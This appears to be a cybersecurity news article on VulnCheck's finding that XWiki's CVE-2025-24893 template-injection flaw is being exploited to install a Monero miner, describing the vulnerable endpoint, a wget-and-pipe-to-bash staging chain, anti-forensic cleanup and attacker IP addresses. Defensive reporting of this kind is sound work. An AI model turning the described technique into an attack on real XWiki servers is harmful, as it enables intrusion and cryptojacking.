An unauthenticated remote code execution vulnerability in XWiki is being actively exploited in the wild to deliver cryptocurrency mining malware, according to threat intelligence findings from VulnCheck.
The vulnerability, CVE-2025-24893, exploits template injection flaws to execute arbitrary code on vulnerable systems without requiring authentication, posing a significant threat to organizations running unpatched XWiki instances.
VulnCheck Canaries have captured a sophisticated two-stage attack chain demonstrating the real-world exploitation of this vulnerability.
Notably, despite ongoing active exploitation throughout 2025, the vulnerability does not currently appear in the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring a critical gap in official vulnerability tracking and the importance of third-party threat intelligence sources.
Two-Stage Exploitation Chain Targets XWiki Deployments
The exploitation workflow proceeds through a carefully orchestrated two-pass approach separated by at least 20 minutes.
In the initial attack phase, threat actors stage a downloader by sending a malicious GET request to the /bin/get/Main/SolrSearch endpoint.
The payload exploits the template injection vulnerability using Groovy scripting capabilities within the text parameter, executing a wget command that downloads a malicious file to the target system’s /tmp directory.
The first-stage downloader, designated as x640, functions as a minimal bash wrapper that immediately pulls two follow-on scripts from the attacker’s infrastructure and pipes them directly to bash for execution.
This staged approach allows attackers to modify payloads post-compromise and test victim connectivity before delivering final-stage malware.
The second-stage scripts establish the foundation for cryptocurrency mining operations.
The x521 script fetches and installs a UPX-packed binary named tcrond, a Monero cryptocurrency miner.
While x522 prepares the system environment, terminates competing mining processes, and launches the miner with a configuration pointing to c3pool.org mining pools.
The cleanup commands executed by x522 demonstrate sophisticated operational security practices, including bash history deletion and process hardening techniques designed to evade detection.
Infrastructure and Attribution
All observed attack traffic originates from IP address 123.25.249.88, which geolocation data indicates is based in Vietnam.
This address appears extensively in recent AbuseIPDB reports documenting malicious activity.
The secondary payload server at 193.32.208.24 operates a transfer.sh instance on port 8080, serving multiple stages of the attack chain.
| CVE ID | Vulnerability Type | Attack Vector | CVSS Score | Affected Versions |
|---|---|---|---|---|
| CVE-2025-24893 | Template Injection / RCE | Network (Unauthenticated) | 9.8 | XWiki versions vulnerable to template injection |
Implications for Enterprise Security
The absence of this vulnerability from CISA KEV despite confirmed active exploitation highlights a critical blind spot in official vulnerability catalogs.
Organizations should prioritize immediate patching of XWiki deployments, implement network segmentation to restrict outbound connections to mining pools, and deploy detection rules targeting the identified infrastructure IP addresses and file hashes.
VulnCheck’s integration of third-party threat intelligence sources provides defenders with earlier warning of emerging threats compared to official vulnerability databases.
Cyber Awareness Month Offer: Upskill With 100+ Premium Cybersecurity Courses From EHA's Diamond Membership: Join Today
%20(1).webp?resize=1600,900&ssl=1&description=VulnCheck Canaries have captured a sophisticated two-stage attack chain demonstrating the real-world exploitation of this vulnerability.){kind=link}